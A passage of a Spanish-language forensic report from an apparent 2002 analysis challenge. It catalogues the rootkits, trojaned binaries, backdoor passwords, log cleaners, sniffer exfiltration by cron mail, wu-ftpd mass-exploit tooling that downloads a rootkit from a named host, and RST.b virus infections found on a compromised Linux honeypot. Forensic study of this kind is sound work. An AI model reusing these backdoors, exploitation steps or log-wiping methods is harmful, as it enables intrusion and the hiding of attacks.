11:23:42 ltima modificacin del fichero /usr/local/games/tcp.log. Este fichero es el fichero de log generado por una instancia de "linsniffer", un conocido sniffer para linux.
Se puede concluir de su contenido que las siguientes mquinas tambin fueron, al menos, escaneadas, y posiblemente atacadas y comprometidas Informe tcnico Reto de Anlisis Forense
Pg. 18 Periodo (Agosto 2002) Accin Evidencia Asociada (desde las fuentes indicadas):
adsl - 209- 233- 126- 166. dsl . scr m01. pacbel l . net => 192. 168. 3. 8 [ 21] pr oxyscan. under net . or g => r edhat 71 [ 23] 67. 96. 226. 249 => 192. 168. 3. 2 [ 21] 67. 96. 226. 249 => 192. 168. 192. 98 [ 21] 62. 194. 200. 212 => 192. 168. 192. 98 [ 21]
Datos: Incluidos en la descripcin.
12:33:15 a 15:36:30 El administrador entra en consola (tty1) como root.
Ejecuta el comando "ls" para mostrar la lista de ficheros de un directorio. Dado que en ese momento el comando "/usr/bin/ls" ya est contaminado por el virus RST.b, su ejecucin provoca que se vuelva a infectar de nuevo el mismo conjunto de comandos bajo /usr/bin. Por ello cambia la fecha de ltima modificacin de todos ellos.
Edita el fichero /.bash_history para eliminar sus propios comandos de l y modifica su fecha de ltima modificacin dejndola a 3 minutos antes de su entrada en el sistema.
A continuacin, lanza la copia binaria de todas las particiones a travs de la red, hacia el servidor de FTP 192.168.3.14 utilizando ncftpput (ver Datos).
Dado que se lanz la copia "en vivo", las imgenes obtenidas son "fotos movidas", con lo que es posible que se den ciertas discrepancias entre distintas particiones o incluso dentro de una misma particin, ya que los sistemas de ficheros son accedidos durante el proceso de copia. Esto no tiene por qu constituir un problema. De hecho, no lo ha sido para realizar esta reconstruccin de los hechos. Simplemente, es importante tener en cuenta cmo se han obtenido las copias para poder conocer las limitaciones de los datos que se podrn obtener de dichas copias. En este caso, todas las modificaciones de ficheros acontecidas despus de las 12:33:15 son sospechosas de reflejar modificaciones parciales.
En este espacio de tiempo, slo aparecen en el timeline los accesos a ficheros provocados por la ejecucin de los comandos del administrador, y cierta actividad espordica de "psybnc" bajo /var/tmp., y de "emech". La informacin sobre esta actividad se incluye en el apartado "Resumen de la actividad IRC".
Datos: En la unidad 888 de la particin de swap, se puede encontrar el siguiente comando compuesto, utilizado por el administrador para obtener las imgenes de las distintas particiones del sistema analizado:
Informe tcnico Reto de Anlisis Forense
Pg. 19 Periodo (Agosto 2002) Accin Evidencia Asociada f di sk - l / dev/ hda | gr ep " ^/ dev" | cut - d " / " - f 3 | awk ' { pr i nt " cat / dev/ " $1" | ncf t pput - u pepel u - c - p x 192. 168. 3. 14 192. 168. 3. 10- " $1" . dd" ; }' | / bi n/ sh
En l se puede ver el usuario (pepelu) y la contrasea (x) que utiliz para llevar por FTP las copias al servidor 192.168.3.14.
15:16:30
Ultimo acceso a fichero registrado.
Datos: En concreto, el ltimo acceso a fichero registrado fue un acceso de lectura al fichero /etc/hosts. Del timeline de Autopsy:
Fr i Aug 23 2002 15: 36: 30 172 . a. - / - r w- r - - r - - r oot / ssh r oot 28276 / et c/ host s
Informe tcnico Reto de Anlisis Forense
Pg. 20 5. Anlisis de artefactos Se denomina artefacto a cada uno de los ficheros que quedan en el sistema como consecuencia de una intrusin. 5.1. Ficheros bajo /var/ftp/nerod El fichero /var/ftp/nerod/nerod.tgz constituye el primer fichero descargado en esta intrusin. Consiste en un rootkit con diversas utilidades. Estos son los ficheros encontrados:
Se trata del primer paquete instalado en el ataque. Es un 'rootkit' que contiene varias utilidades, como se describe a continuacin /var/ftp/nerod/.1addr 6b7b4d6270255ba973f 9865020490423
Fichero que contiene las direcciones de IP a esconder, y que al instalarse el rootkit fue copiado a /dev/ttyoa /var/ftp/nerod/.1file 14aaf eab735548f 0d6c24cf b6e6803c0
Fichero que contiene los nombres de fichero a esconder, y que al instalarse el rootkit fue copiado a /dev/ttyof /var/ftp/nerod/.1logz 9da4ef c8df c18db52f 0f 39f dc1f 04f f 3
Fichero que contiene las cadenas a esconder, y que al instalarse el rootkit fue copiado a /dev/ttyos /var/ftp/nerod/.1proc 710657a7b9f 9f b864739f 57a71f 37ecc
Fichero que contiene los procesos a esconder, y que al instalarse el rootkit fue copiado a /dev/ttyop /var/ftp/nerod/atd.init 5e13cb6e8a752921bae378ea9ccbb2ec
Fichero de arranque del demonio 'atd', instalado en /etc/rc.d/init.d/atd, que adems de arrancar del demonio de 'at' tal y como hace el fichero estndar, se asegura de arrancar todos los troyanos instalados con unas lneas de "inet_start all" camufladas por enmedio. Esta funcin 'inet_start' est definida en el fichero 'functions'. /var/ftp/nerod/chsh 71dcb1516635e8910a37444ecd95992f
Troyano del comando /usr/bin/chsh, est adems protegido contra el anlisis, al capturar las llamadas a 'ptrace'. Se trata de un 'backdoor' que da acceso al sistema como 'root' al introducir como nueva shell la palabra clave "satori". Este binario es alguna variante del incluido en el rootkit lrk4, ver Uhttp://project.honeynet.org/papers/enemy3/README.txt.U /var/ftp/nerod/clean f 9e2970e3a7682440316b6e1a2687cbe
Script para borrar todas las lneas conteniendo una cadena que se pase como parmetro de todos los ficheros de log bajo /var/log, rearrancando el demonio syslogd. En la instalacin del script, se copia a /usr/bin/clean. Informe tcnico Reto de Anlisis Forense
Fichero 'core' generado por el comando "/ usr/bin/mc -P". A partir del nombre del fichero y analizando las cadenas dentro de l, se trata del "Midnight Commander", un "file manager" en modo texto bastante potente (ver Uhttp://www.ibiblio.org/mc/U). Se trata de un 'core' que ya estaba en el paquete original 'nerod.tar.gz', por lo que se gener en otro sistema, antes de crearse el mismo. As, podemos averiguar que el core lo gener el usuario 'root' en un sistema Linux llamado "nfk" y desde el directorio /mnt/c/hacking/lucrare/ptftp/kfn. /var/ftp/nerod/crontab- entry 5c525103dcef a78d55af b2e9a68e4907
Fichero de configuracin de cron, para enviar el primero de cada mes el fichero resultado de sniffing (/usr/local/games/tcp.log) junto con la configuracin de red del sistema a la direccin de correo suntsfant2@yahoo.com" /var/ftp/nerod/du 12cc055bf 763b37f 9792b7bef 92cf 093
Troyano del comando /usr/bin/du, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof /var/ftp/nerod/find eb1c26da59b892570f 4567469d49bd8c
Troyano del comando /usr/bin/find, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof /var/ftp/nerod/functions 527bda3068675f 780f 66ecb909491c7a
Script que define la funcin 'inet_start' para arrancar los siguientes troyanos: sshd y el sniffer bajo /usr/local/games/identd. Se copi al final del fichero /etc/rc.d/init.d/functions estndar por el script de instalacin del rootkit. De esta forma, y al ser tambin modificados /etc/rc.d/init.d/atd y /etc/rc.d/init.d/inet, se asegura el arranque automtico de los mismos con el inicio del sistema. /var/ftp/nerod/ifconfig 8455e6975ecccd09dc53f bb26768d19d
Troyano del comando /sbin/ifconfig, esconde de su salida el flag PROMISC, permitiendo tener un interfaz de red en modo promiscuo (para sniffing) sin despertar sospechas. Es un fichero distinto al encontrado bajo sshd/ifconfig, aunque con el mismo propsito. /var/ftp/nerod/imp da4171d1b46b7792b79a53f c87457f e4
Herramienta de denegacin de servicio (DoS) mediante la tcnica de 'SYN flooding', bombardea a un sistema objetivo con un alto nmero de peticiones de conexin, consiguiendo de forma efectiva su paralizacin. Instalada en /usr/bin/imp. Conocida tambin como 'slice3' puede obtenerse en Uhttp://packetstormsecurity.nl/DoS/indexdate.shtmlU /var/ftp/nerod/inet ab0e77af c2091a2791ee91415a935f c4
Modificacin del fichero /etc/rc.d/init.d/inet de RedHat 6.0 para ejecutar "inet_start all" y arrancar los troyanos (ver fichero functions). Puesto que en RedHat 7 se emplea xinetd en lugar de inetd, este fichero no lleg a instalarse (ver script de instalacin). /var/ftp/nerod/install 6d3bca60f 8064f f 015ecf 29b06eeddae
Script de instalacin del rootkit. Realiza las tareas de copiar los diferentes troyanos a sus lugares adecuados en el sistema, chequear la existencia de otros rootkits, as como recoger informacin del sistema y enviarla a direcciones de correo. No lleg a ejecutarse completamente (ver Cronograma de actividades). /var/ftp/nerod/install.log 9f b4f 7f 2e0c138839924381f d274e91b
Fichero de log de la instalacin del rootkit. Contiene numerosos errores (pues hay ficheros no encontrados, as como prueba que no se ejecut completamente. Informe tcnico Reto de Anlisis Forense
Troyano del comando /usr/bin/killall, ignora los procesos indicados en el fichero de configuracin /dev/ttyop /var/ftp/nerod/linsniffer 10f 6663e2e867f 4d3f 628648d340e7be
Sniffer de red. Instalado en /usr/local/games/identd por el script de instalacin, recoge el trfico de red y lo almacena en /usr/local/games/tcp.log /var/ftp/nerod/login 9288dac26e0aae060bc2bb036020b451
Se trata de un 'backdoor' del comando login estndar que permite la entrada en el sistema a cualquier cuenta mediante el password escondido "satori", sea cual sea el password real del usuario. Adicionalmente, si el acceso de root est restringido a otros terminales, emplear el usuario "rewt" da acceso como "root". Finalmente, desactiva el 'history log' si se emplea el backdoor /var/ftp/nerod/ls 9e7165f 965254830d0525f da3168f d7d
Troyano del comando /bin/ls, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. Se trata del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo, Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU) /var/ftp/nerod/md5bd 93002f 144f de901260f 4b4ebdce57630
backdoor de red. Se trata de una shell conectada al puerto 465 (smtps) hacindose pasar por un servidor Sendmail: aparece el banner tpico de: 220 - localhost.localdomain SMTPS Sendmail 8.11.0/8.11.0; <fecha>. Cualquier comando que se le introduzca produce un simulacro de error: 500 5.5.1 Command unrecognized: "<comando>" Unicamente al introducir una palabra cuyo checksum md5 de como resultado "855f314a4a3eebb6e1f9c3dae3a8ae31" (generado con un simple echo -n | /usr/bin/md5sum) se abre automticamente una shell, de la que se ha eliminado el history log. Este binario se copia a /usr/sbin/atd mediante el script de 'install'. Se trata del mismo fichero descrito en Uhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtU. /var/ftp/nerod/me d0a432ea2e4e9b462d29796da8eb7bcb
Instalado en /bin/me por el script de instalacin del rootkit, es un script que nicamente contiene:
#!/bin/sh unset HISTFILE unset TMOUT echo " cd /usr/man/man1/psybnc" echo " open Hftp.geocities.comH"
/var/ftp/nerod/netstat c0e8b6f f 00433730794eda274c56de3f
Troyano del comando /bin/netstat, esconde de su salida las direcciones IP o nombres de dominio indicadas en el fichero de configuracin /dev/ttyoa. Se trata del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo, Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU) /var/ftp/nerod/ps a71c756f 78583895af e7e03336686f 8b
Troyano del comando /bin/ps, esconde de su salida los procesos indicados en el fichero de configuracin /dev/ttyop Informe tcnico Reto de Anlisis Forense
Troyano del comando /usr/bin/pstree, esconde de su salida los procesos indicados en el fichero de configuracin /dev/ttyop /var/ftp/nerod/sense 464dc23cac477c43418eb8d3ef 087065
Script de perl para analizar la salida del sniffer LinSniffer, el script de instalacin lo copia a /usr/local/games/banner. Se trata del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo, Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU) /var/ftp/nerod/shad 55955848943cbe9a0bc0f e3d14cba972
Programa para arrancar otros binarios escondiendo su autntico nombre, cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar> <parametros>. /var/ftp/nerod/sshd/ifconfi g 086394958255553f 6f 38684dad97869e
Troyano del comando /sbin/ifconfig, esconde de su salida el flag PROMISC, permitiendo tener un interfaz de red en modo promiscuo (para sniffing) sin despertar sospechas. Una bsqueda del checksum en google confirma que se trata de un fichero ampliamente conocido, perteneciente al rootkit 'lrk5'. Ver, por ejemplo, Uhttp://www.linuxfocus.org/English/ November2002/ article263.shtmlU. /var/ftp/nerod/sshd/init.ssh d b33deb29db1aed81866e048416b0bd68
Script de arranque del demonio sshd. El script 'sshd-install' lo copia a /etc/rc.d/init.d/sshd. /var/ftp/nerod/sshd/install.l og d41d8cd98f 00b204e9800998ecf 8427e
Fichero de configuracin del cliente ssh. No es instalado por el script de instalacin en ningn sitio. /var/ftp/nerod/sshd/ssh_ho st_key 4ef f c0e40601df 5c7ac6617c4f 41eb51
Clave privada de ssh, la copia el script de instalacin a /etc y /etc/ssh. Interesante la cadena root@xxxbuck.com. /var/ftp/nerod/sshd/ssh_ho st_key.pub e7c0f 95946172c5092f 3e8e9538c3a01
Clave publica de ssh, la copia el script de instalacin a /etc y /etc/ssh. Interesante la cadena Hroot@harospro.netH /var/ftp/nerod/sshd/ssh_ra ndom_seed 117d5a5ec19a5d0ac029f 2a07f c3b617
Fichero semilla para ssh, se copia a /etc/ssh y /etc /var/ftp/nerod/sshd/sshd d17e923542b202746b9b3dad26ed25e7
Se trata de un troyano de sshd, con una puerta trasera que permite el acceso al sistema con el password cuyo md5 sea "54818b05d116eadc7f67517a3a6e4b33", como puede verse en el cdigo: Informe tcnico Reto de Anlisis Forense
Fichero de configuracin de sshd, lo copia el script 'sshd-install' a /etc/sshd_config y /etc/ssh/sshd_config. Configura al demonio para escuchar en el puerto 1981, en lugar del estndar 22. /var/ftp/nerod/sshd/sshd- install a03539cf 459cd43f f 53754ceca78e0ef
Script de instalacin del troyano de sshd, copia el binario y los ficheros de configuracin y claves a los directorios estndar de ssh. /var/ftp/nerod/sysinfo b40f a196dad1170bb4c52a35a73e6457
Script para recolectar informacin del sistema: configuracin hardware y software, ficheros mpeg y mp3 e informacin sobre tarjetas de crdito. /var/ftp/nerod/syslogd 53f c8c03b327952f be891d4f 02a036b8
Syslogd troyano, no enva al log del sistema ninguna informacin con cadenas encontradas en /dev/ttyos /var/ftp/nerod/syslogd.init 29056af 3f f 697f 3cf 5de07ef 3bc46814
Script de arranque del demonio syslogd, se copia a /etc/rc.d/init.d/syslog. /var/ftp/nerod/top 58a7e5abe4b01923c619aca3431e13a8
Troyano del comando /usr/bin/top, esconde de su salida los procesos indicados en el fichero de configuracin /dev/ttyop /var/ftp/nerod/vdir bf b9788eaa2010ebad96be6aead8a600
Troyano del comando /usr/bin/vdir, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. /var/ftp/nerod/wp c4774db51553f 61c8aef b1bcc123a81c
Programa para limpiar los ficheros de log wtmp,utmp y lastlog. Es el mismo referido en Uhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtU
Informe tcnico Reto de Anlisis Forense
Pg. 25 5.2. Ficheros bajo /root/., Bajo /root/., encontramos una serie de ficheros instalados por el intruso. Se trata de dos paquetes: awu.tgz y psyBNC.tar.gz, descargados mediante wget como demuestran las lneas del fichero /root/.bash_history: wget Hwww.geocities.com/master0n/awu.tgzH wget www.geocities.com/gavish19/psyBNC.tar.gz Los ficheros de dichos paquetes se agrupan bajo sendos subdirectorios: o awu o psybnc
Ficheros bajo aw
Fichero MD5 / Descripcin /root/.,/awu.tgz 602141db068f c251a352f b474f f a5a74
Paquete que contiene los ficheros. Descargado de www.geocities.com/master0n mediante wget (como puede verse en el fichero /root/.bash_history) el 23 de Agosto a las 01:41:51 (de acuerdo con los tiempos de acceso de los ficheros). Un paquete similar a este aparece referido en Uhttp://www.giac.org/practical/J erry_Pierce_GCFA.docU y en el incidente de Uhttp://serkoon.honeypots.net/smenutz.htmlU. Hay tambin informacin en Uhttp://www.zone-h.org/en/forum/thread/forum=3/thread=18950/U /root/.,/aw/12.216.pscan.21 d41d8cd98f 00b204e9800998ecf 8427e
Fichero vaco. Resultado de la bsqueda de sistemas con un servidor ftp en la subred 12.216 mediante el programa 'pscan2'. Aparentemente se abort la ejecucin de "awu 12.216" mediante Control-C (ver /root/.bash_history). /root/.,/aw/auto ac45b33a1951a851142b2ec670e43664
Simple script para llamar a 'awu' probando una subred clase A entera:
echo "Enter A class range" read brange echo "Enter output file" read file crange=0 while [ $crange -lt 255 ] ; do echo -n "./awu $brange.$crange ; " >>$file let crange=crange+1 done
Programa para, de forma automtica, entrar en los sistemas vulnerables al exploit 'wu' de una red clase B. El funcionamiento es el siguiente: 1- Con ayuda de 'pscan2', se detectan los sistemas con el puerto 21 (ftpd) activo. 2- Se eliminan sistemas duplicados empleando 'sort' y 'nodupe' 3- Se buscan aquellos servidores wu-ftp vulnerables, mediante 'ssvuln'. 4- Se intenta entrar en cada uno de ellos mediante 'oops' (que a su vez llama de forma recursiva a 'ss') e instalar automticamente un rootkit. 5- La lista final generada contiene los sistemas listos para entrar con un backdoor ya instalado. /root/.,/aw/awu.list 5de1b020d2e7dd350b2104c54ab6899d
Contiene una lista de 6 direcciones IP y sus nombres asociados, resultado de la ejecucin de 'ss', en los cuales se ejecut de forma satisfactoria el exploit 'wu' y se instal automticamente un rootkit (5 de ellos en la red 62.X.X.X). La misma est ya contenida en el fichero original awu.tgz, luego se gener en un sistema distinto /root/.,/aw/awu.log 38191e26af e4084f f 8cde4b27c1f 0ca4
Fichero de log resultado de la ejecucin de awu, buscando sistemas vulnerables en las subredes 128.123.X.X., y entrando de forma automtica en 6 de ellos. /root/.,/aw/doit4me 92bad96c06ee8269423caf bf 4f b53f 04
Script muy parecido a 'auto' para escanear una subred clase A entera, slo que con comentarios en rumano. /root/.,/aw/Makefile 480432ec9b9e79d9f 1913ef a4187b2a9
Makefile para generar los binarios 'pscan2', 'oops', 'ss', 'nodupe' y 'ssvuln' a partir de sus fuentes correspondientes. Es interesante que no existe fuente alguno para los exploits 'wu' y 'x2'. /root/.,/aw/nodupe f 79b61d2b4725c192883397580f 93f ad
Programa que ordena y elimina direcciones IP duplicadas de un fichero de entrada (que se toma como primer parmetro) y lo escribe en un fichero de salida (que se toma como segundo parmetro). Empleado por 'awu' despus de la fase de deteccin de direcciones IP. /root/.,/aw/nodupe.c 5b47796f 7f 96f b5aa2ab487900294404
Cdigo fuente en C del anterior programa /root/.,/aw/nodupe.o 9f 7cb0c1a84e7cf 888f b5e6be379caf 0
Fichero objeto del anterior programa /root/.,/aw/oops ce1ef a87422513db8599a0f 3d4939f 3b
Programa para llamar al exploit 'ss' de forma recursiva con todas las direcciones IP contenidas en un fichero que se pasa como parmetro. Empleado por awu. /root/.,/aw/oops.c e9c6ea1c70c86e206955b6143ac1d559
Cdigo fuente en C del anterior programa /root/.,/aw/oops.o cb63a4e21e35566c744b418a15c91ea4
Fichero objeto del anterior programa /root/.,/aw/outpu ca7ebe136969e0c8f f 334ed55259de90
Contiene una nica gran lnea con la llamada a 'awu' con las subredes de la 62.0 a la 62.254. Aunque el nombre sugiere que es el resultado de alguna ejecucin, puede perfectamente emplearse para lanzar dichos comandos.
Programa para escanear subredes clase B en busca de sistemas con un determinado puerto activo. La subred y puerto a escanear se introduce como parmetro y el resultado se guarda en un fichero de nombre <subred>.pscan.<puerto>. El scanning se realiza en paralelo hasta 650 sockets para minimizar el tiempo de bsqueda. /root/.,/aw/pscan2.c 9b2e77ee16f f 2c29e08cba331d74057c
Cdigo fuente en C del anterior programa /root/.,/aw/ss 987f 5d76f 78d1e0a6f 9e504a0f 140eda
Programa para intentar entrar en un sistema, cuya direccin IP se pasa como parmetro, mediante el exploit 'wu'. Ejecuta 'wu -t -d <ip_address>' y si entra en la victima, le intenta instalar de forma automtica un rootkit, descargado de http://diablows.org/gold.tgz mediante wget lynx. Si consigue de forma efectiva instalar el backdoor correspondiente, guarda su direccin IP en el fichero awu.list para su posterior revisin. El rootkit http://diablows.org/gold.tgz es referido en el incidente Uhttp://www.incidents.org/detect/rating.htmlU y en Uhttp://serkoon.honeypots.net/smenutz.htmlU, pero el fichero en cuestin ya no est disponible en esa url. /root/.,/aw/ss.c b91ca7103105f de7054f 3424e8d82d4b
Cdigo fuente en C del anterior programa /root/.,/aw/ssvuln e9220bde5b4be41365f f 78e609d97446
Programa para buscar servidores wu-ftpd. Las direcciones a testear se indican en un fichero que se pasa como parmetro y la lista de los encontrados se guarda en otro fichero que se pasa como segundo parmetro. El programa paraleliza la bsqueda creando tantos procesos hijo como se le indique en el tercer parmetro. /root/.,/aw/ssvuln.c 071245a9bc3b47771c12278f 450114a0
Cdigo fuente en C del anterior programa /root/.,/aw/targets 92ef c70ddbd865b388be9ea3f 0c39001
Contiene una lista de versiones de SSHD, presumiblemente las vulnerables al exploit 'x2'. /root/.,/aw/test.c d41d8cd98f 00b204e9800998ecf 8427e
Fichero vaco. Su propsito es desconocido, puesto que no se usa en los otros programas. /root/.,/aw/test.f d8e8f ca2dc0f 896f d7cb4cb0031ba249
Fichero que nicamente contiene la palabra "test". Al igual que el anterior, su propsito es desconocido. /root/.,/aw/wu 33459cdd140ac993a326a8f 4b76f 19c5
Exploit hecho por TESO (http://teso.scene.at) para la vulnerabilidad de globbing de mltiples versiones de wu-ftpd, incluyendo 2.6.1-16. El exploit, tanto una versin compilada como su cdigo fuente, estn disponibles en las siguientes direcciones:
Esta es su descripcin original: "This is a TESO exploit for the double free() bug that Informe tcnico Reto de Anlisis Forense
Pg. 28 exists in multiple wu-ftpd servers. The exploit can target many different Linux/x86 configurations and is distributed in binary form. Targets wu-2.4.2-academ[BETA- 18](1), wu-2.6.0(1), wu-2.4.2, wu-2.6.1-18, wu-2.6.1-16, and more." El checksum del fichero coincide con el binario disponible en http://packetstormsecurity.nl. La vulnerabilidad que aprovecha est descrita en los siguientes boletines de seguridad: Uhttp://www.cert.org/advisories/CA-2001-33.html Uhttp://www.kb.cert.org/vuls/id/886083 Uhttp://www.kb.cert.org/vuls/id/AAMN-54WPCS Uhttp://rhn.redhat.com/errata/RHSA-2001-157.html Uhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0550U
/root/.,/aw/x2 1309689a9af 6b82e11e8df a5c6282c30 /root/.,/aw/x2 Se trata de un "exploit" para atacar los puertos de sshd, empleando la vulnerabilidad descrita en el aviso "SSH1 CRC-32 compensation attack detector vulnerability" (Uhttp://www.securityfocus.com/advisories/3088U). Tanto la salida del comando 'strings' como el checksum md5 coinciden con un binario conocido. Un anlisis profundo del exploit puede encontrarse en HUhttp://staff.washington.edu/dittrich/misc/ssh-analysis.txtUH
En resumen, nos encontramos ante un scanner que automatiza la intrusin en sistemas con wu-ftpd vulnerable. Este sera el esquema de trabajo de awu:
awu pscan2 nodupe ssvuln ss oops Servidor 1 Servidor 2 Servidor 3 IP address 1.- Deteccin de servidores ftp 2.- Eliminacin de servidores duplicados 3.- Seleccin de servidores wu-ftpd wu exploit gold.tgz rootkit 4.- Entrada al sistema e instalacin de backdoor 5.- Generada lista final con los sistemas comprometidos y el backdoor instalado y verificado. Fichero incluido en awu.tgz Descargado automticamente de http://www.diablows.org Informe tcnico Reto de Anlisis Forense
Pg. 29
Ficheros bajo psybnc El directorio /root/.,/psybnc contiene la versin 2.2.1 del conocido proxy de IRC psybnc, descargado mediante wget desde www.geocities.com/gavish19. psybnc permite mantener conexiones IRC de forma annima, entre otras funcionalidades (ver, por ejemplo, HUhttp://www.jestrix.net/tuts/psy.htmlUH HUhttp://www.netknowledgebase.com/tutorials/psybnc.htmlUH ). Se trata del primer proxy de IRC configurado en el sistema. A partir de los ficheros de configuracin y ficheros de log, es posible conocer a qu servidores, qu canales y con que nicks se conect el usuario. Puesto que en el anlisis hemos encontrado ms de un proxy de IRC, hemos credo interesante analizar todos ellos de forma conjunta en el apartado 5.5 Resumen de la actividad IRC.
Informe tcnico Reto de Anlisis Forense
Pg. 30 5.3. Ficheros bajo /var/tmp/., Una ltima fase de creacin de ficheros consisti en crear el directorio /var/tmp/., y descargar sobre l los paquetes manu.tgz y psy.tgz, nuevamente obtenidos mediante wget: wget Hwww.geocities.com/adrianboy20ro/psy.tgzH wget www.mumutzz.go.ro/manu.tgz En ambos casos, tras instalar el paquete correspondiente, borra los ficheros con rm. No obstante, en el caso de manu.tgz puede recuperarse del disco mediante autopsy. /var/tmp/.,/psybnc/ contiene los ficheros de otra instancia del proxy IRC psybnc, esta vez en la versin 2.2.2beta. En este caso, el atacante ha renombrado el binario a httpd para intentar disimular su presencia. La informacin obtenida del anlisis de estos ficheros puede verse en el apartado 5.5 Resumen de la actividad IRC. /var/tmp/.,/emech contiene los ficheros del IRC bot emech.
Fichero de configuracin de usuarios de emech. Contiene Adrian y George /var/tmp/.,/emech/emech.users.save 68b329da9893e34099c7d8ad5cb9c940
Fichero de configuracin de usuarios que estaba originalmente en el paquete manu.tgz, no contiene ningn usuario. /var/tmp/.,/emech/httpd 9e56400ac68ab3278460bed8df c91e3f
emech IRC bot. (ver Uhttp://www.energymech.net/U) Es el binario de 'emech', si bien el atacante lo ha cambiado de nombre para intentar pasar desapercibido con el nombre de un servidor web estndar. Se trata adems del fichero contaminado con el virus RST.b cuya ejecucin provoc la aparicin de los ficheros /dev/hdx1 y /dev/hdx2 y la contaminacin de otros ficheros en /bin. Una buena descripcin del virus est disponible en Uhttp://UHUwww.virusbtn.com/magazine/archives/pdf/2002/200202.PDFUH /var/tmp/.,/emech/LinkEvents 9869c9eb2868bf 53b21738492160d0af
Registra el arranque de emech el 23 Ago a las 10:20:29: 1030090829 EnergyMech started... /var/tmp/.,/emech/mech.levels e75d953b41779538cb4e148dc6934c44 /var/tmp/.,/emech/mech.session 44b868f a12a80f 674905a1f af 5b7052b /var/tmp/.,/emech/mech.set 2821f b2c4613886826d5d60b796e2de8
Ficheros de configuracin de emech. La informacin obtenida del anlisis de estos ficheros puede verse en el apartado 5.5 Resumen de la actividad IRC. /var/tmp/.,/emech/mech.pid 013c04f 8e2ec5ea4316d0cf 85d8dc52a
Fichero que contiene el PID del proceso emech (7989) Informe tcnico Reto de Anlisis Forense
Pg. 31
5.4. Ficheros bajo /bin, /usr/bin y otros directorios del sistema
Como consecuencia de la instalacin del rootkit bajo /var/ftp/nerod, diversos comandos y ficheros de configuracin del sistema fueron alterados. Adicionalmente, la ejecucin del fichero /var/tmp/.,/emech/httpd, infectado con el virus RST.b (ver [12]) , provoc la infeccin de toda una serie de binarios bajo /bin. Finalmente, algunos otros ficheros modificados por la ejecucin de alguna accin especfica durante el ataque son tambin descritos aqu.
Fichero MD5 / Descripcin /bin/chgrp f cd4b5b713a65f 0a0f acf f 1f ec9f 7adb
binario original, infectado por el RST.b virus /bin/chmod 091d7e041cd159af 58cf 2ae7c2308ecf
binario original, infectado por el RST.b virus /bin/chown c9432d8f 9f 47d0c2b5077899a9959195
binario original, infectado por el RST.b virus /bin/cp f 97def d364f 96870e544ea6f 35a88bf 8
binario original, infectado por el RST.b virus /bin/cpio d057e30942689af d6709667ef 53d37f f
binario original, infectado por el RST.b virus /bin/dd ad57f e67aab271c189379e9647db4f 6b
binario original, infectado por el RST.b virus /bin/df 5bd8d84153c532bb6cd6753a2896450a
binario original, infectado por el RST.b virus /bin/ed 1e0c75b2cb4b04a24cb78f 1011af a5b6
binario original, infectado por el RST.b virus /bin/hostname 2d608e6246213bb4e0af 7be1f 25a4f 21
binario original, infectado por el RST.b virus /bin/ln 1bbb0f d3956bcc2e1258400ec1064a46
binario original, infectado por el RST.b virus /bin/lnetstat 30286974e55bb9f 9e82f 93cc44c39492
Binario /bin/netstat original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /bin/login 9288dac26e0aae060bc2bb036020b451
Instalado desde /var/ftp/nerod. Se trata de un 'backdoor' del login estndar que permite la entrada en el sistema mediante el password escondido "satori", sea cual sea el password real del usuario. Adicionalmente, emplear el usuario "rewt" da acceso como "root". Informe tcnico Reto de Anlisis Forense
Pg. 32 /bin/lps ac0b58050deb21db1ed701277521320b
Binario /bin/ls original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install /bin/ls cf b7a44f 86a5e648f def 3367e2b6495b
Troyano del comando ls, esconde de su salida los ficheros cuyos nombres contengan lo indicado en el fichero de configuracin /dev/ttyof. Instalado desde /var/ftp/nerod/install y contaminado por el virus RST.b. /bin/lsp dc1961b6ce3f f 6d6f e2c89c8603f 4985
Binario /bin/ls original de RedHat 7.1, movido aqu por el script /var/ftp/nerod/install / bin/ mail 030678939129ca2a1c0f b896f 61a597e
binario original, infectado por el RST.b virus /bin/me d0a432ea2e4e9b462d29796da8eb7bcb
Instalado desde /var/ftp/nerod por el script de instalacin del rootkit, es un script que nicamente contiene:
#!/bin/sh unset HISTFILE unset TMOUT echo " cd /usr/man/man1/psybnc" echo " open ftp.geocities.com" /bin/mkdir abf 35510c59121810e5ca4bd51df 99f a
binario original, infectado por el RST.b virus /bin/mknod 7c2def 7291b2c3ba89b9272bdf 2f b29d
binario original, infectado por el RST.b virus /bin/mktemp 4a0a1da5160458609427e48eddc61960
binario original, infectado por el RST.b virus /bin/mt 200a5dcf 77ebeb4890727c5d45cdaa14
binario original, infectado por el RST.b virus /bin/mv 6f 839f 6be00c930ca0a4713df 57995d2
binario original, infectado por el RST.b virus /bin/netstat 018f f 2c8b70dc7534eed16c846c756ec
Troyano del comando netstat, esconde de su salida las direcciones IP o nombres de dominio indicadas en el fichero de configuracin /dev/ttyoa. Instalado por /var/ftp/nerod/install y contaminado con el virus RST.b /bin/ping 5eb2f cd4a86f 49a3f 24d2b624f c869c3
binario original, infectado por el RST.b virus / bin/ ps a71c756f 78583895af e7e03336686f 8b
Troyano del comando 'ps' estndar. Esconde de su salida todos los procesos indicados en el fichero /dev/ttyop. El checksum md5 coincide con un fichero con el que ya nos hemos encontrado en otro anlisis forense. En concreto, se trata del mismo fichero instalado por un rootkit en la intrusin descrita en el reto de Honeynet nmero 29. ( ver Uhttp://project.honeynet.org/scans/scan29/U) /bin/setserial 365a33d2809406bf 304ad1a2347e9e7a
RST.b virus. setserial "seguro" traido por los administradores del honeypot
